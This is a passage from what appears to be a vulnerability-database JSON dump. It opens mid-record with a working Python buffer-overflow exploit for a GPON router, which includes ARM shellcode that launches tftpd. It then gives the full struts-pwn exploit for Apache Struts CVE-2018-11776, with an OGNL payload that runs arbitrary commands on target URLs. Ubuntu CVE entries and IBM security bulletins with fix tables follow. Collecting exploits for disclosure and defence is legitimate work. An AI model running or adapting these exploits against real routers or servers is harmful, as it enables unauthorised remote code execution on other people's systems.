/GponForm/usb_Form?script/ HTTP/1.1\n # Host: 192.168.1.1\n # User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\n # Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n # Accept-Language: en-US,en;q=0.5\n # Accept-Encoding: gzip, deflate\n # Referer: http://192.168.1.1/usb.html\n # Content-Type: application/x-www-form-urlencoded\n # Content-Length: 639\n # Connection: close\n # Upgrade-Insecure-Requests: 1\n\n # XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1\n \n # Weaponizing request:\n\n # mov r8, r8 ; NOP for ARM Thumb\n\n nop = \"\\xc0\\x46\"\n \n # .section .text\n # .global _start\n # \n # _start:\n # .code 32\n # add r3, pc, #1\n # bx r3\n # \n # ; We've removed prev commands as processor is already in Thumb mode\n #\n # .code 16\n # add r0, pc, #8\n # eor r1, r1, r1\n # eor r2, r2, r2\n # strb r2, [r0, #10] ; Changing last char of command to \\x00 in runtime\n # mov r7, #11\n # svc #1\n # .ascii \"/bin/tftpdX\" \n\n shellcode = \"\\x02\\xa0\\x49\\x40\\x52\\x40\\x82\\x72\\x0b\\x27\\x01\\xdf\\x2f\\x62\\x69\\x6e\\x2f\\x74\\x66\\x74\\x70\\x64\\x58\"\n\n # Overwritting only 3 bytes in order to get \\x00 in 4th\n\n pc = \"\\xe1\\x8c\\x03\"\n\n exploit = \"A\" + 197 * nop + shellcode + 26*\"A\" + pc \n\n payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous', \n 'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'', \n 'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}\n headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',\n 'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',\n 'Connection': 'close', 'Upgrade-Insecure-Requests':'1', \n 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'} \n # Prevent requests from URL encoding\n payload_str = \"&\".join(\"%s=%s\" % (k,v) for k,v in payload.items())\n try:\n requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)\n except:\n pass\n\n print(\"The payload has been sent. Please check UDP 69 port of router for the tftpd service\");\n print(\"You can use something like: sudo nmap -sU -p 69 192.168.1.1\");\n\n\ndef main():\n \"\"\" Parse command line arguments and start exploit \"\"\"\n \n #\n # Exploit should be executed after reboot. You can easily achive this in 3 ways:\n # 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that\n # 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from \"device.html\" page\n # 3) Repeat this exploit at least twice ;)\n # any of those will work!\n #\n \n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"Examples: %(prog)s -t http://192.168.1.1/\")\n\n # Adds arguments to help menu\n parser.add_argument(\"-h\", action=\"help\", help=\"Print this help message then exit\")\n parser.add_argument(\"-t\", dest=\"target\", required=\"yes\", help=\"Target URL address like: https://localhost:443/\")\n\n # Assigns the arguments to various variables\n args = parser.parse_args()\n\n run(args.target)\n\n\n#\n# Main\n#\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-26T00:00:00", "type": "exploitpack", "title": "Apache Struts 2.3 2.3.34 2.5 2.5.16 - Remote Code Execution (1)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "href": "", "sourceData": "#!/usr/bin/env python3\n# coding=utf-8\n# *****************************************************\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\n# Author:\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\n# This code uses a payload from:\n# https://github.com/jas502n/St2-057\n# *****************************************************\n\nimport argparse\nimport random\nimport requests\nimport sys\ntry:\n from urllib import parse as urlparse\nexcept ImportError:\n import urlparse\n\n# Disable SSL warnings\ntry:\n import requests.packages.urllib3\n requests.packages.urllib3.disable_warnings()\nexcept Exception:\n pass\n\nif len(sys.argv) <= 1:\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\n print('[*] Struts-PWN - @mazen160')\n print('\\n%s -h for help.' % (sys.argv[0]))\n exit(0)\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-u\", \"--url\",\n dest=\"url\",\n help=\"Check a single URL.\",\n action='store')\nparser.add_argument(\"-l\", \"--list\",\n dest=\"usedlist\",\n help=\"Check a list of URLs.\",\n action='store')\nparser.add_argument(\"-c\", \"--cmd\",\n dest=\"cmd\",\n help=\"Command to execute. (Default: 'id')\",\n action='store',\n default='id')\nparser.add_argument(\"--exploit\",\n dest=\"do_exploit\",\n help=\"Exploit.\",\n action='store_true')\n\n\nargs = parser.parse_args()\nurl = args.url if args.url else None\nusedlist = args.usedlist if args.usedlist else None\ncmd = args.cmd if args.cmd else None\ndo_exploit = args.do_exploit if args.do_exploit else None\n\nheaders = {\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Accept': '*/*'\n}\ntimeout = 3\n\n\ndef parse_url(url):\n \"\"\"\n Parses the URL.\n \"\"\"\n\n # url: http://example.com/demo/struts2-showcase/index.action\n\n url = url.replace('#', '%23')\n url = url.replace(' ', '%20')\n\n if ('://' not in url):\n url = str(\"http://\") + str(url)\n scheme = urlparse.urlparse(url).scheme\n\n # Site: http://example.com\n site = scheme + '://' + urlparse.urlparse(url).netloc\n\n # FilePath: /demo/struts2-showcase/index.action\n file_path = urlparse.urlparse(url).path\n if (file_path == ''):\n file_path = '/'\n\n # Filename: index.action\n try:\n filename = url.split('/')[-1]\n except IndexError:\n filename = ''\n\n # File Dir: /demo/struts2-showcase/\n file_dir = file_path.rstrip(filename)\n if (file_dir == ''):\n file_dir = '/'\n\n return({\"site\": site,\n \"file_dir\": file_dir,\n \"filename\": filename})\n\n\ndef build_injection_inputs(url):\n \"\"\"\n Builds injection inputs for the check.\n \"\"\"\n\n parsed_url = parse_url(url)\n injection_inputs = []\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\n\n try:\n url_directories.remove(\"\")\n except ValueError:\n pass\n\n for i in range(len(url_directories)):\n injection_entry = \"/\".join(url_directories[:i])\n\n if not injection_entry.startswith(\"/\"):\n injection_entry = \"/%s\" % (injection_entry)\n\n if not injection_entry.endswith(\"/\"):\n injection_entry = \"%s/\" % (injection_entry)\n\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\n injection_entry += parsed_url[\"filename\"]\n\n injection_inputs.append(injection_entry)\n\n return(injection_inputs)\n\n\ndef check(url):\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\n multiplication_value = random_value * random_value\n injection_points = build_injection_inputs(url)\n parsed_url = parse_url(url)\n print(\"[%] Checking for CVE-2018-11776\")\n print(\"[*] URL: %s\" % (url))\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\n attempts_counter = 0\n\n for injection_point in injection_points:\n attempts_counter += 1\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n continue\n if \"Location\" in resp.headers.keys():\n if str(multiplication_value) in resp.headers['Location']:\n print(\"[*] Status: Vulnerable!\")\n return(injection_point)\n print(\"[*] Status: Not Affected.\")\n return(None)\n\n\ndef exploit(url, cmd):\n parsed_url = parse_url(url)\n\n injection_point = check(url)\n if injection_point is None:\n print(\"[%] Target is not vulnerable.\")\n return(0)\n print(\"[%] Exploiting...\")\n\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\n\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\n\n try:\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\n except Exception as e:\n print(\"EXCEPTION::::--> \" + str(e))\n return(1)\n\n print(\"[%] Response:\")\n print(resp.text)\n return(0)\n\n\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\n if url:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n if usedlist:\n URLs_List = []\n try:\n f_file = open(str(usedlist), \"r\")\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\n try:\n URLs_List.remove(\"\")\n except ValueError:\n pass\n f_file.close()\n except Exception as e:\n print(\"Error: There was an error in reading list file.\")\n print(\"Exception: \" + str(e))\n exit(1)\n for url in URLs_List:\n if not do_exploit:\n check(url)\n else:\n exploit(url, cmd)\n\n print(\"[%] Done.\")\n\n\nif __name__ == \"__main__\":\n try:\n main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)\n except KeyboardInterrupt:\n print(\"\\nKeyboardInterrupt Detected.\")\n print(\"Exiting...\")\n exit(0)", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2023-06-20T14:08:20", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible\nRemote Code Execution when alwaysSelectFullNamespace is true (either by\nuser or a plugin like Convention Plugin) and then: results are used with no\nnamespace and in same time, its upper package have no or wildcard namespace\nand similar to results, same possibility when using url tag which doesn't\nhave value and action set and in same time, its upper package have no or\nwildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11776", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-22T00:00:00", "id": "UB:CVE-2018-11776", "href": "https://ubuntu.com/security/CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T14:58:52", "description": "The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and\n2.5.x before 2.5.10.1 has incorrect exception handling and error-message\ngeneration during file-upload attempts, which allows remote attackers to\nexecute arbitrary commands via a crafted Content-Type, Content-Disposition,\nor Content-Length HTTP header, as exploited in the wild in March 2017 with\na Content-Type header containing a #cmd= string.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | \"Affected Software Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-11T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5638", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-11T00:00:00", "id": "UB:CVE-2017-5638", "href": "https://ubuntu.com/security/CVE-2017-5638", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-06-24T05:46:06", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 & 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, & 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": "https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined 